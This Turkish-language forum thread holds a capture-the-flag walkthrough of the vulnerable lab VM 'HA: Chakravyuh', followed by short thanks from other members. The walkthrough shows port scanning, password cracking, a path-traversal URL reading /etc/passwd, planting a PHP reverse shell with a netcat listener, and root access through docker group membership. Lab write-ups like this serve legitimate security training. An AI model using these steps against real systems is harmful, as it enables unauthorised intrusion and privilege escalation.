THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly

Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
378
Konular:
68
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
09-11-2019 10:54
#1
HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
HA: Chakravyuh

Merhabalar değerli Türk Hack Team ailesi, bu konumda sizlere "HA: Chakravyuh Zafiyetli Makine Çözümünü" göstereceğim. Zafiyetli Makine Çözümünü yaptığım kaynağa ulaşmak için tıklayın; Tıklayın.

HA: Chakravyuh



İsim: HA: Chakravyuh

Çıkış Tarihi: 30 Ekim 2019

Yapım: Hacking Articles

Dosya Boyutu: 1.1-Gb

Zorluk: Orta Düzey

Açıklama: "Root Erişimini Almak"

Hedef: final.txt

Seri: HA



Her şeyden önce hedefimizi belirlemeye çalışıyoruz ve gerekli İP ve Mac Adreslerini belirliyoruz. netdiscover


Hedef makinemiz içerisinde bulunan servis ve sağlayıcılar için bilgi toplamak amacıyla bağlantı noktalarını tarıyoruz. Tüm bağlantı noktalarını taradığımızda, hedef Makinede SSH hizmeti (22), HTTP servisi (80), FTP servisi (65530) bulunduğunu görüyoruz.

Kod:
 nmap -p- -A 192.168.1.105





Ardından tarayıcımıza 192.168.105 yazarak anasayfamıza gidiyoruz.




Daha sonra dikkatimizi 65530 limanına yönlendirilen hizmete yönlendirdik. FTP hizmetine girdikten sonra pub adında bir belge bulmaya çalışıyoruz. İçinde arjun adlı bir sıkıştırılmış"7z dosyası" var. Daha sonrasında get komutu yardımıyla indirmemizi yapıyoruz.

Kod:
 ftp 192.168.1.105 65530


Kod:
 Anonymous


Kod:
 ls


Kod:
 get arjun.7z


Kod:
 bye





Daha sonrasında indirmemiz tamamlandığında dosyayı "Archive Manager" ile açmayı deniyoruz. Ardından karşımıza gelen ekranda bize bir şifre soruyor. Bu şifreyi çeşitli yollarla bulmayı deniyoruz.

Daha sonrasında "John The Ripper" aracını kullanmaktan başka çaremiz kalmıyor. Ardından şifrenin "xyz2john" olduğunu öğreniyoruz. Ardından bunu google kullanarak aratıyoruz. Ardından karşımıza "7z2john" çıkıyor.

Kod:
 python 7z2ctf.py arjun.7z > hash


Kod:
 john --wordlist=/usr/share/wordlists/rockyou.txt hash


Kod:
 john hash --show


Kod:
arjun.7z:family






Sıkıştırılmış dosyayı, içinde gizli bir metin dosyası bulmak için açtık. Secret.txt açıldığında içinde kodlanmış bir metin bulunuyor. İlk bakışta, Base64 kodlu metin gibi görünüyordu.

Kod:
 Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=




Echo ve base64 komutunu kullanarak secret.txt dosyasındaki metnin kodunu çözmeyi başardık.

Kod:
 echo "Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=" | base64 -d


Kod:
 gila:admin@gmail.com:princesa




Gila CMS'ye sahip olduğumuz ipucunu aldık. Ardından buraya erişim sağlamaya çalıştık. Sonucunda bir web sayfası önümüze geldi.

Kod:
 http://192.168.1.105/gila/




Ardından" /gila/admin " şeklinde girmeyi deniyoruz.

Kod:
 http://192.168.1.105/gila/admin


Kod:
admin@gmail.com


Kod:
princesa



Ardından admin paneline giriş yapmış bulunduk. Daha sonrasında exploit için bir yol aramaya başladık.





Ardından araştırmalarımız sonucunda bir şey bulamadık. Bundan dolayı searchsploit içerisinde keşif yapıyoruz.


Kod:
 searchsploit gila cms



Kod:
 Gila CMS < 1.11.1 - Local File Inclusio


Kod:
 searchsploit -m 47407


Kod:
 cat 47407.txt




Xampp Server üzerinde çalıştığını ve hedef makinemizin bir Linux makinesi olduğunu rahatça görebiliyoruz. Böylece, "/etc/passwd" da bulunan linki değiştirdik. Ayrıca, gilacms bölümünde hali hazırda bir web sayfası bulunuyor. /gila/ 'da gördük. Böylece biz de o kısmı değiştirdik.

Kod:
 http://192.168.1.105/gila/admin/fm/?f=src../../../../../../../../../etc/passwd






İndex.php dosyasına sahip olduğumuzu görüyoruz. Girdiğimiz yol gibiydi. Dosyayı açtık. Dizin sayfasının görüntülenmesi için PHP kodunu içeriyordu. PHP reverse shell kodumuzu pentestmonkey ile kullandık. IP Adresini Saldırgan Makinemizin IP adresi ile değiştirdik. Saldırgan makinemizde bir netcat dinlemesi başlattık. Gerekli değişiklikleri yaptıktan sonra değişiklikleri index.php içerisine kaydettik. Ardından dosyayı açtık




Dosyayı açtığımızda, PHP'nin reverse shell'i çalıştı ve shell'i hedef makineye aldık. Yanlış bir shell olduğundan uygun bir shell'e dönüştürmek için kullandık. Memnuniyeti gereğince kabuğu aldıktan sonra, hedef makinedeki kullanıcıları ve grupları görmek için id komutunu çalıştırdık.


Kod:
 
nc -lvp 1234


Kod:
 
python -c 'import


Kod:
 
id





Docker çalışırken, docker'da docker'daki tüm komutların sudo gerektirmesi ve docker'ın çalışması için root gerektirmesi sorunu olduğunu biliyoruz. Bundan dolayı aşağıdaki komutu çalıştırıyoruz.

Kod:
 docker run -v /root:/mnt -it alpine


Kod:
cd /mnt


Kod:
ls


Kod:
cat final.txt








Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler



Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
378
Konular:
68
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
09-11-2019 23:47
#2
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
Güncel +++
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
23
Mesajlar:
939
Konular:
143
Teşekkür (Etti):
396
Teşekkür (Aldı):
405
Ticaret:
(0) %
10-11-2019 01:24
#3
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
Elinize sağlık adım adım tertemiz bir anlatım yapmışsınız En kısa zamanda kurup denicem
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Xowly Teşekkür etti.
Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
378
Konular:
68
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
10-11-2019 12:44
#4
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
Alıntı:
By Ghost´isimli üyeden Alıntı Mesajı göster
Elinize sağlık adım adım tertemiz bir anlatım yapmışsınız En kısa zamanda kurup denicem
Teşekkür ediyorum.
"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.559
Konular:
481
Teşekkür (Etti):
1121
Teşekkür (Aldı):
2268
Ticaret:
(0) %
10-11-2019 16:55
#5
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
Ellerine saglik junior
Xowly Teşekkür etti.
Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
378
Konular:
68
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
10-11-2019 20:50
#6
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Ellerine saglik junior
Teşekkürler kıdemli bey
z2salkovski - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
root$
Mesajlar:
238
Konular:
16
Teşekkür (Etti):
3
Teşekkür (Aldı):
36
Ticaret:
(0) %
10-11-2019 21:00
#7
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
Vay, şaşırdım. Emek var eline sağlık.
--------------------- Gül rengi fermente üzüm suyu, içilmez mi böyle günde?
637ad44b4e72e2b58fa8c5d0cac6701d
Xowly - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
06/2019
Nereden:
ғ˦
Mesajlar:
378
Konular:
68
Teşekkür (Etti):
359
Teşekkür (Aldı):
237
Ticaret:
(0) %
10-11-2019 22:31
#8
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
Alıntı:
z2salkovski´isimli üyeden Alıntı Mesajı göster
Vay, şaşırdım. Emek var eline sağlık.
Teşekkür ederim
"PurpposoLes - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
DataBase
Mesajlar:
3.291
Konular:
268
Teşekkür (Etti):
953
Teşekkür (Aldı):
1081
Ticaret:
(0) %
10-11-2019 23:01
#9
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
Başarılı bir konu tebrik ederim.
---------------------
ɱყ ŋąɱɛ ıʂ "℘ųཞ℘℘ơʂơƖɛʂ
ı'ɱ ą ცƖąƈƙ ɧąɬ

Öʅüɱʂüȥ αşƙʅαɾ ʋαɾԃα, öʅɱҽყҽɳ αşıƙ ʋαɾ ɱı?

єѕкι αηкα тιмι αѕιѕтαηı..
andro26 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
los encılıs
Mesajlar:
245
Konular:
11
Teşekkür (Etti):
35
Teşekkür (Aldı):
18
Ticaret:
(0) %
10-11-2019 23:49
#10
Cevap: HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly
faydalı teşekkürler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler